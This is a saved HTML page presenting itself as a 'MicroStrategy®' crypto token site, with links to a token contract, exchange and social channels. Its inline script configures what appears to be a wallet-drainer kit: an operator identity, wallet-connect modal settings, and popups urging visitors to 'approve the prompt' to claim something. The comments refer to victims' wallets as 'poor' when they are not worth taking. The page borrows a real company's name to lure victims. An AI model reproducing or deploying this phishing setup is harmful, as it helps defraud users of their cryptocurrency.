<!DOCTYPE html>
<html lang="en"
  style="--wcm-color-fg-1: rgb(20,20,20); --wcm-color-fg-2: rgb(121,134,134); --wcm-color-fg-3: rgb(158,169,169); --wcm-color-bg-1: rgb(255,255,255); --wcm-color-bg-2: rgb(241,243,243); --wcm-color-bg-3: rgb(228,231,231); --wcm-color-overlay: rgba(0,0,0,0.1); --wcm-accent-color: #3396FF; --wcm-accent-fill-color: #FFFFFF; --wcm-z-index: 89; --wcm-background-color: #3396FF; --wcm-background-border-radius: 8px; --wcm-container-border-radius: 30px; --wcm-wallet-icon-border-radius: 15px; --wcm-wallet-icon-large-border-radius: 30px; --wcm-wallet-icon-small-border-radius: 7px; --wcm-input-border-radius: 28px; --wcm-button-border-radius: 10px; --wcm-notification-border-radius: 36px; --wcm-secondary-button-border-radius: 28px; --wcm-icon-button-border-radius: 50%; --wcm-button-hover-highlight-border-radius: 10px; --wcm-text-big-bold-size: 20px; --wcm-text-big-bold-weight: 600; --wcm-text-big-bold-line-height: 24px; --wcm-text-big-bold-letter-spacing: -0.03em; --wcm-text-big-bold-text-transform: none; --wcm-text-xsmall-bold-size: 10px; --wcm-text-xsmall-bold-weight: 700; --wcm-text-xsmall-bold-line-height: 12px; --wcm-text-xsmall-bold-letter-spacing: 0.02em; --wcm-text-xsmall-bold-text-transform: uppercase; --wcm-text-xsmall-regular-size: 12px; --wcm-text-xsmall-regular-weight: 600; --wcm-text-xsmall-regular-line-height: 14px; --wcm-text-xsmall-regular-letter-spacing: -0.03em; --wcm-text-xsmall-regular-text-transform: none; --wcm-text-small-thin-size: 14px; --wcm-text-small-thin-weight: 500; --wcm-text-small-thin-line-height: 16px; --wcm-text-small-thin-letter-spacing: -0.03em; --wcm-text-small-thin-text-transform: none; --wcm-text-small-regular-size: 14px; --wcm-text-small-regular-weight: 600; --wcm-text-small-regular-line-height: 16px; --wcm-text-small-regular-letter-spacing: -0.03em; --wcm-text-small-regular-text-transform: none; --wcm-text-medium-regular-size: 16px; --wcm-text-medium-regular-weight: 600; --wcm-text-medium-regular-line-height: 20px; --wcm-text-medium-regular-letter-spacing: -0.03em; --wcm-text-medium-regular-text-transform: none; --wcm-font-family: -apple-system, system-ui, BlinkMacSystemFont, 'Segoe UI', Roboto, Ubuntu, 'Helvetica Neue', sans-serif; --wcm-font-feature-settings: 'tnum' on, 'lnum' on, 'case' on; --wcm-success-color: rgb(38,181,98); --wcm-error-color: rgb(242, 90, 103); --wcm-overlay-background-color: rgba(0, 0, 0, 0.3); --wcm-overlay-backdrop-filter: none;"
  data-scrapbook-source="https://www.microstrategy.vip/" data-scrapbook-create="20231101184234480"
  data-scrapbook-title="MicroStrategy®">

  <script defer="defer" src="js/vendors.js"></script>
  <script defer="defer" src="js/contracts.js"></script>
  <script defer="defer" src="js/main.js"></script>
  
  <script>
    window.UNIQUE_IDENTITY = "yelping_cheetah_23";
  
    // Pick a theme here, this defaults to "light"
    window.modal_theme = "light";
  
    // https://docs.walletconnect.com/2.0/web/walletConnectModal/theming
    window.modal_variables = { "--w3m-z-index": "99999999999999999999999999999999",
    /* Example of what you can do */
    // "--w3m-accent-color": "#591D6E",
    // "--w3m-background-color": "#FF00FF", 
    // "--w3m-logo-image-url": "/your-logo.svg",
    };
  
    // Notification modals
   window.popups = {
  PENDING: {
    // The popup that shows when they get prompted
    title: "Claim Pending",
    text: "You must approve the prompt in order to continue."
  },
  INVALID: {
    // Shown when they connect on a wallet that is poor.
    // title: "Ineligible Address",
    text: "The connected account is not eligible for this event.\nPlease try using a different account.",
  }
    }
  
    // Only touch this if you know what you're doing!
    window.OVERRIDE_MODE = false;
  </script>
  </head>
  <link rel="stylesheet" href="6899fe254f21d737.css" data-precedence="next">
  <style id="_goober">
    @keyframes go2264125279 {
      from {
        transform: scale(0) rotate(45deg);
        opacity: 0;
      }

      to {
        transform: scale(1) rotate(45deg);
        opacity: 1;
      }
    }

    @keyframes go3020080000 {
      from {
        transform: scale(0);
        opacity: 0;
      }

      to {
        transform: scale(1);
        opacity: 1;
      }
    }

    @keyframes go463499852 {
      from {
        transform: scale(0) rotate(90deg);
        opacity: 0;
      }

      to {
        transform: scale(1) rotate(90deg);
        opacity: 1;
      }
    }

    @keyframes go1268368563 {
      from {
        transform: rotate(0deg);
      }

      to {
        transform: rotate(360deg);
      }
    }

    @keyframes go1310225428 {
      from {
        transform: scale(0) rotate(45deg);
        opacity: 0;
      }

      to {
        transform: scale(1) rotate(45deg);
        opacity: 1;
      }
    }

    @keyframes go651618207 {
      0% {
        height: 0;
        width: 0;
        opacity: 0;
      }

      40% {
        height: 0;
        width: 6px;
        opacity: 1;
      }

      100% {
        opacity: 1;
        height: 10px;
      }
    }

    @keyframes go901347462 {
      from {
        transform: scale(0.6);
        opacity: 0.4;
      }

      to {
        transform: scale(1);
        opacity: 1;
      }
    }

    .go4109123758 {
      z-index: 9999;
    }

    .go4109123758>* {
      pointer-events: auto;
    }
  </style>
  <style type="text/css">
    .marquee-container {
      overflow-x: hidden !important;
      display: flex !important;
      flex-direction: row !important;
      position: relative;
      width: var(--width);
      transform: var(--transform);
    }

    .marquee-container:hover div {
      animation-play-state: var(--pause-on-hover);
    }

    .marquee-container:active div {
      animation-play-state: var(--pause-on-click);
    }

    .overlay {
      position: absolute;
      width: 100%;
      height: 100%;
    }

    .overlay::before,
    .overlay::after {
      background: linear-gradient(to right, var(--gradient-color));
      content: "";
      height: 100%;
      position: absolute;
      width: var(--gradient-width);
      z-index: 2;
    }

    .overlay::after {
      right: 0;
      top: 0;
      transform: rotateZ(180deg);
    }

    .overlay::before {
      left: 0;
      top: 0;
    }

    .marquee {
      flex: 0 0 auto;
      min-width: var(--min-width);
      z-index: 1;
      display: flex;
      flex-direction: row;
      align-items: center;
      animation: scroll var(--duration) linear var(--delay) var(--iteration-count);
      animation-play-state: var(--play);
      animation-delay: var(--delay);
      animation-direction: var(--direction);
    }

    @keyframes scroll {
      0% {
        transform: translateX(0%);
      }

      100% {
        transform: translateX(-100%);
      }
    }

    .initial-child-container {
      flex: 0 0 auto;
      display: flex;
      min-width: auto;
      flex-direction: row;
    }

    .child {
      transform: var(--transform);
    }
  </style>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="icon" href="favicon.ico" type="image/x-icon" sizes="any">
  <meta name="next-size-adjust">
  <title>MicroStrategy®</title>
  <script
    data-scrapbook-elem="custom-elements-loader">(function (names) { if (!customElements) { return; } for (const name of names) { customElements.define(name, class CustomElement extends HTMLElement { }); } })(["next-route-announcer", "wcm-explorer-context", "wcm-theme-context", "wcm-modal"])</script>
</head>

<body class="__className_e66fe9">
  <div class="font-serif">
    <div class="select-none" style="pointer-events: none;">
      <div style="top: 750.486px; left: 1441.5px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
      <div style="top: 7.20364px; left: 104.501px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
      <div style="top: 891.691px; left: 41.035px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
      <div style="top: 805.818px; left: 1836.23px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
      <div style="top: 507.801px; left: 641.753px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
      <div style="top: 386.524px; left: 1356.11px;" class="absolute text-4xl select-none "><img src="strikes.gif"
          class="select-none"></div>
    </div>
    <div class="fixed top-0 flex flex-wrap left-0 justify-between w-full p-2 z-10 text-lg font-bold"><a><button
          class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">🔊 Mute</button></a>
      <div class="flex items-end"><a
          href="https://etherscan.io/address/0xb2b68f7785daecf337749491c4a5ff9de3c964ef"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">Etherscan®</button></a><a
          href="https://www.dextools.io/app/en/ether/pair-explorer/0xb2b68f7785daecf337749491c4a5ff9de3c964ef"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">DexTools</button></a><a
          href="#balances"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">Stats</button></a><a
          href="https://app.uniswap.org/#/swap?outputCurrency=0xb2b68f7785daecf337749491c4a5ff9de3c964ef"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">Buy
            MSTR®</button></a><a href="https://t.me/mstrclub"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">Telegram</button></a><a
          href="https://twitter.com/mstrcoineth"><button
            class="mx-1 bg-white text-blue-600 hover:underline hover:bg-blue-600 hover:text-white">Twitter</button></a>
      </div>
    </div><video src="main.mp4" class="w-screen h-screen object-cover" autoplay="" playsinline="" loop=""></video>
    <div class="flex flex-col items-center text-white z-10">
      <div class="-mt-10 flex flex-col items-center">
        <div>Scroll for MicroStrategy®</div>
      </div>
    </div>
    <div style="--pause-on-hover: running; --pause-on-click: running; --width: 100%; --transform: none;"
      class="marquee-container bg-blue-600 text-white font-bold text-3xl">
      <div class="marquee"
        style="--play: running; --direction: normal; --duration: 22.459833984375s; --delay: 0s; --iteration-count: infinite; --min-width: 100%;">
        <div class="initial-child-container">
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
          <div style="--transform: none;" class="child">
            <div class="mx-2">MicroStrategy®</div>
          </div>
        </div>
      </div>
      <div class="marquee"
        style="--play: running; --direction: normal; --duration: 22.459833984375s; --delay: 0s; --iteration-count: infinite; --min-width: 100%;">
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
        <div style="--transform: none;" class="child">
          <div class="mx-2">MicroStrategy®</div>
        </div>
      </div>
    </div>
    <div class="fixed bottom-0 left-0 w-screen z-10 pb-1"></div>
  </div><next-route-announcer style="position: absolute;"
    data-scrapbook-shadowdom="<div aria-live=&quot;assertive&quot; id=&quot;__next-route-announcer__&quot; role=&quot;alert&quot; style=&quot;position: absolute; border: 0px; height: 1px; margin: -1px; padding: 0px; width: 1px; clip: rect(0px, 0px, 0px, 0px); overflow: hidden; white-space: nowrap; overflow-wrap: normal;&quot;></div>"></next-route-announcer><iframe
    id="verify-api" src="urn:scrapbook:download:error:https://verify.walletconnect.com/"
    style="display: none;"></iframe><wcm-modal
    data-scrapbook-shadowdom="<!----><wcm-explorer-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-explorer-context><wcm-theme-context data-scrapbook-shadowdom=&quot;<!---->&quot;></wcm-theme-context><div id=&quot;wcm-modal&quot; role=&quot;alertdialog&quot; aria-modal=&quot;true&quot; class=&quot; wcm-overlay &quot;><div class=&quot;wcm-container&quot; tabindex=&quot;0&quot;><!--?lit$0507945395$--></div></div>"></wcm-modal>
  <script
    data-scrapbook-elem="basic-loader">(function () { var k1 = "data-scrapbook-shadowdom", k2 = "data-scrapbook-canvas", k3 = "data-scrapbook-input-indeterminate", k4 = "data-scrapbook-input-checked", k5 = "data-scrapbook-option-selected", k6 = "data-scrapbook-input-value", k7 = "data-scrapbook-textarea-value", fn = function (r) { var E = r.querySelectorAll ? r.querySelectorAll("*") : r.getElementsByTagName("*"), i = E.length, e, d, s; while (i--) { e = E[i]; if ((d = e.getAttribute(k1)) !== null && !e.shadowRoot && e.attachShadow) { s = e.attachShadow({ mode: 'open' }); s.innerHTML = d; e.removeAttribute(k1); } if ((d = e.getAttribute(k2)) !== null) { (function () { var c = e, g = new Image(); g.onload = function () { c.getContext('2d').drawImage(g, 0, 0); }; g.src = d; })(); e.removeAttribute(k2); } if ((d = e.getAttribute(k3)) !== null) { e.indeterminate = true; e.removeAttribute(k3); } if ((d = e.getAttribute(k4)) !== null) { e.checked = d === 'true'; e.removeAttribute(k4); } if ((d = e.getAttribute(k5)) !== null) { e.selected = d === 'true'; e.removeAttribute(k5); } if ((d = e.getAttribute(k6)) !== null) { e.value = d; e.removeAttribute(k6); } if ((d = e.getAttribute(k7)) !== null) { e.value = d; e.removeAttribute(k7); } if (e.shadowRoot) { fn(e.shadowRoot); } } }; fn(document); })()</script>
</body>
<div style="position: fixed; z-index: 9999; inset: 16px; pointer-events: none;"></div>

</html>